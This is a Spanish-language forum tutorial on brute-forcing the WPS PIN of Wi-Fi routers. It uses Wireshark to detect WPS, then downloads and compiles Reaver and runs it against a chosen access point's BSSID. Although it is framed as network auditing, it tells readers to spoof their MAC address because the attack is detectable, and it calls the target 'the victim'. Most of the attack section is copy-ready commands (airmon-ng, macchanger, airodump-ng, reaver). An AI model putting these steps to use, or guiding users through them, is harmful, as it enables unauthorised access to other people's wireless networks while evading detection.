Un pequeño aporte para las auditorias de redes
El atque es de fuerza burta ya que se ha descubierto una vulnerabilidad en el servicio wps de algunos modems
Aclarando que esto lo hice desde backtrack 5 r1 lo intente con wifiway y no me funciono
pero vallan intentado en ubuntu u otra distribución linux y me cuentan que tal les fue
Los programas necesarios para este tutorial son wireshark y reaver
Primero que nada necesitamos tener una antena de wifi compatible con modo monitor (yo use una wifisky 980wg con chip rtl8187)
Primer paso: Para evitar perder el tiempo es indispensable determinar si la red a auditar tiene activado WPS.
1) Desde la consola poner la tarjeta de red en modo monitor
# airmon-ng start wlan0
2) Abrimos el wireshark.
-> Menu Capture
->Options
Elegimos interfaz mon0 (o la que nos haya dado el airmon).
3) Nos aseguramos que no esté seleccionada ninguna opción, como se vé en la imagen
4) Le damos a Start para comenzar la captura de paquetes.
5) Para ver si tiene el WPS activado miramos en los paquetes broadcast la información que se encuentra en:
->IEEE 802.11 wireless LAN management frame
->Tagged parameters:
-> Tag: Vendor Specific: Microsoft WPS
Ejemplo:
Si la red tiene WPS se puede proceder a utilizar Reaver
Instalando reaver
# wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
# tar xvf /root/reaver-1.4.tar.gz (segun sea la ubicacion del archivo)
Procedemos a compilar
# cd /root/reaver-1.4/src
#./configure
#make
#make install
1) Dado que los ataques WPS son detectables, indispensable cambiar la MAC
# macchanger -m 00:11:22:33:44:55 mon0
2)Poner tarjeta en modo monitor
# airmon-ng star wlan0
3) Buscar el AP deseado y anotar su BSSID correspondiente
# airodump-ng mon0
4) Se ejecuta Reaver de esta manera
# reaver -i mon0 -b 00:11:22:33:44:56
-i interface -mac de la victima
Cabe anotar que aunque el Router tenga el boton fisico de WPS instalado, el modo no necesariamente esta habilitado internamente. Segun el manual Reaver no funciona con todos los Routers, y algunos pueden simplemente bloquearse ante el ataque.
En los routers que he podido obtener la clave fueron un 2wire y D-Link
como el ataque es a fuerza bruta es demasiado lento pero vale la pena intentarlo
Aqui unas capturas del programa funcionando
Aclaro que el proceso fue muy lento ya que duro como 3 hrs